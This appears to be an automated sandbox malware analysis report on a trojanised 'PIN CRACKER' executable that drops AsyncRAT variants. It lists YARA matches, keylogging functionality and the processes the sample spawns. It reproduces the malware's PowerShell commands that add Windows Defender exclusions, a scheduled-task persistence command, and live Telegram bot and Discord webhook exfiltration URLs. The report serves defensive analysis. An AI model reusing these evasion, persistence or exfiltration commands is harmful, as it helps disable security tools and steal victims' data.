Source: powershell.exe, 00000008.00000002.1413749213.0000015D62201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FCC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857861000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003184000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegrP
Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003184000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, adawsfaefasfasfg.exe.0.dr, wasdwasfwasfs.exe.0.dr, Systen User.2.dr	String found in binary or memory: https://api.telegram.org/bot
Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=75388
Source: powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: PIN CRACKER V2.bat.0.dr	String found in binary or memory: https://discord.gg/2e8UXZp2Fq
Source: where.exe, 00000007.00000002.1328741520.0000028CA97B4000.00000004.00000020.00020000.00000000.sdmp, PIN CRACKER V2.bat.0.dr	String found in binary or memory: https://discordapp.com/api/webhooks/1309170780696870912/8yNfzeRdjxyYLYxaut1-j0gdfkndb6ZneH0LI8EP6wjx
Source: qmgr.db.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000001F.00000003.2560713768.0000024CFDDA0000.00000004.00000800.00020000.00000000.sdmp, edb.log.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1470720955.000002853FD37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1761595477.0000013FDF314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1750246959.0000012AEDCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2055474118.0000017199AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49958 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: adawsfaefasfasfg.exe.0.dr, XLogger.cs	.Net Code: KeyboardLayout
Source: wasdwasfwasfs.exe.0.dr, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: Systen User.2.dr, XLogger.cs	.Net Code: KeyboardLayout

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: 01 00 00 00			Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: 01 00 00 00			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Creates files with lurking names (e.g. Crack.exe)

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

File created: C:\Users\user\PIN CRACKER V2.bat

Jump to behavior

Source: C:\Users\user\adawsfaefasfasfg.exe	Code function: 2_2_00007FF887D25CC6	2_2_00007FF887D25CC6
Source: C:\Users\user\adawsfaefasfasfg.exe	Code function: 2_2_00007FF887D212D9	2_2_00007FF887D212D9
Source: C:\Users\user\adawsfaefasfasfg.exe	Code function: 2_2_00007FF887D26A72	2_2_00007FF887D26A72
Source: C:\Users\user\adawsfaefasfasfg.exe	Code function: 2_2_00007FF887D21CFD	2_2_00007FF887D21CFD
Source: C:\Users\user\wasdwasfwasfs.exe	Code function: 3_2_00007FF887D15446	3_2_00007FF887D15446
Source: C:\Users\user\wasdwasfwasfs.exe	Code function: 3_2_00007FF887D11301	3_2_00007FF887D11301
Source: C:\Users\user\wasdwasfwasfs.exe	Code function: 3_2_00007FF887D161F2	3_2_00007FF887D161F2
Source: C:\Users\user\wasdwasfwasfs.exe	Code function: 3_2_00007FF887D19CF0	3_2_00007FF887D19CF0
Source: C:\Users\user\AppData\Roaming\Systen User	Code function: 26_2_00007FF887D312D9	26_2_00007FF887D312D9
Source: C:\Users\user\AppData\Roaming\Systen User	Code function: 26_2_00007FF887D31CFD	26_2_00007FF887D31CFD

Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameadawsfaefasfasfg.exe4 vs ozgpPwVAu1.exe
Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewasdwasfwasfs.exe4 vs ozgpPwVAu1.exe
Source: ozgpPwVAu1.exe, 00000000.00000002.1327150654.000000001B958000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamead vs ozgpPwVAu1.exe
Source: ozgpPwVAu1.exe	Binary or memory string: OriginalFilenameNXS MULTI TOOLS V5.exe4 vs ozgpPwVAu1.exe

Source: ozgpPwVAu1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: ozgpPwVAu1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ozgpPwVAu1.exe

Static PE information: Section: .rsrc ZLIB complexity 0.9910519622093024

Source: ozgpPwVAu1.exe, TGZL3mfzzUkOgkHp4g0oyQycwm9mvPij2rxscxy.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: adawsfaefasfasfg.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: adawsfaefasfasfg.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: adawsfaefasfasfg.exe.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: wasdwasfwasfs.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: wasdwasfwasfs.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: wasdwasfwasfs.exe.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: adawsfaefasfasfg.exe.0.dr, Settings.cs	Base64 encoded string: 'LqfX5mhN3Y8Qc2I8YQoMBANuJPoRALzbamtix4oI48cy/xZRZLQZPB3nb0dcarIgIxWy5IiCSZr+0kXCT2e1AA==', 'KV+jkX41MNJNjZw0OvfFyIiDKmbex/GFVzK7GiJAaZ3EK2GxEEVhUrusa5ptTKn3'
Source: wasdwasfwasfs.exe.0.dr, Settings.cs	Base64 encoded string: 'JrNV/jMUjHR6tXpIQ7iruOLIvH47ucmK9ajd/QDfRGxvH9xLpHdWMtcYMX0D9yqM'
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Settings.cs	Base64 encoded string: 'JrNV/jMUjHR6tXpIQ7iruOLIvH47ucmK9ajd/QDfRGxvH9xLpHdWMtcYMX0D9yqM'
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Settings.cs	Base64 encoded string: 'LqfX5mhN3Y8Qc2I8YQoMBANuJPoRALzbamtix4oI48cy/xZRZLQZPB3nb0dcarIgIxWy5IiCSZr+0kXCT2e1AA==', 'KV+jkX41MNJNjZw0OvfFyIiDKmbex/GFVzK7GiJAaZ3EK2GxEEVhUrusa5ptTKn3'
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Settings.cs	Base64 encoded string: 'LqfX5mhN3Y8Qc2I8YQoMBANuJPoRALzbamtix4oI48cy/xZRZLQZPB3nb0dcarIgIxWy5IiCSZr+0kXCT2e1AA==', 'KV+jkX41MNJNjZw0OvfFyIiDKmbex/GFVzK7GiJAaZ3EK2GxEEVhUrusa5ptTKn3'
Source: Systen User.2.dr, Settings.cs	Base64 encoded string: 'LqfX5mhN3Y8Qc2I8YQoMBANuJPoRALzbamtix4oI48cy/xZRZLQZPB3nb0dcarIgIxWy5IiCSZr+0kXCT2e1AA==', 'KV+jkX41MNJNjZw0OvfFyIiDKmbex/GFVzK7GiJAaZ3EK2GxEEVhUrusa5ptTKn3'

Source: adawsfaefasfasfg.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: adawsfaefasfasfg.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: wasdwasfwasfs.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: wasdwasfwasfs.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Systen User.2.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Systen User.2.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@37/37@3/4

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

File created: C:\Users\user\adawsfaefasfasfg.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Systen User	Mutant created: NULL
Source: C:\Users\user\wasdwasfwasfs.exe	Mutant created: \Sessions\1\BaseNamedObjects\p3YdZDJ8ethXsiAZ
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Users\user\adawsfaefasfasfg.exe	Mutant created: \Sessions\1\BaseNamedObjects\DpaQ0HHJ8Dn0bxYG
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Mutant created: \Sessions\1\BaseNamedObjects\DmSq17kOSCazTZ1HX
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03

Source: C:\Users\user\adawsfaefasfasfg.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "

Source: ozgpPwVAu1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ozgpPwVAu1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ozgpPwVAu1.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\ozgpPwVAu1.exe "C:\Users\user\Desktop\ozgpPwVAu1.exe"
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Users\user\adawsfaefasfasfg.exe "C:\Users\user\adawsfaefasfasfg.exe"
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Users\user\wasdwasfwasfs.exe "C:\Users\user\wasdwasfwasfs.exe"
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where curl
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'
Source: C:\Users\user\wasdwasfwasfs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\wasdwasfwasfs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Systen User "C:\Users\user\AppData\Roaming\Systen User"
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Users\user\adawsfaefasfasfg.exe "C:\Users\user\adawsfaefasfasfg.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Users\user\wasdwasfwasfs.exe "C:\Users\user\wasdwasfwasfs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where curl	Jump to behavior

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Section loaded: iertutil.dll	Jump to behavior
